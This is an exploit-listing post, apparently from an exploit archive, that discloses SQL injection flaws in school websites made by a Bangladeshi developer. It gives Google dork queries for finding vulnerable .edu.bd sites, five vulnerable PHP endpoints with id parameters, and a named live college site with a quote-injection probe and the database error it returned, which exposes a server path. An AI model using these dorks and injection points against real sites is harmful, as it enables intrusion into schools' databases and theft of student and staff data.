facebook facebook twitter rss

Design & Developed By Target Soft Bangladesh SQL Injection Vulnerability

Author: KingSkrupellos , Published: 11-10-2018
# Exploit Title : Design & Developed By Target Soft Bangladesh SQL Injection Vulnerability

# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army

# Vendor Homepage : targetsoftbd.com

# Tested On : Windows

# Category : WebApps

# Exploit Risk : Medium

# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

# CXSecurity : cxsecurity.com/ascii/WLB-2018090040

# Cyberizm : cyberizm.org/cyberizm-design-developed-by-target-soft-bangladesh-sql-inj.html

#################################################################################################

# Google Dorks : intext:''All contents copyright © 2015 . All rights reserved Design & Develope By : Target Soft''

intext:Design & Develope By : Target Soft'' site:edu.bd

intext:Design & Developed By : Target Soft'' site:edu.bd

# Exploits :

/view_notices.php?id=[SQL Injection]
/view_page.php?id=[SQL Injection]
/view_teacher.php?id=[SQL Injection]
/view_stuccess_st.php?id=[SQL Injection]
/view_management.php?id=[SQL Injection]

#################################################################################################

# Example Site => dhakaoxfordintcollege.edu.bd/view_notices.php?id=40%27 => [ Proof of Concept ] => archive.is/Fh7Ni

# SQL Database Error =>

Warning: mysql_fetch_array() expects parameter 1 to be resource,
boolean given in /home/dhakaoxfordintco/public_html/view_notices.php on line 25

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :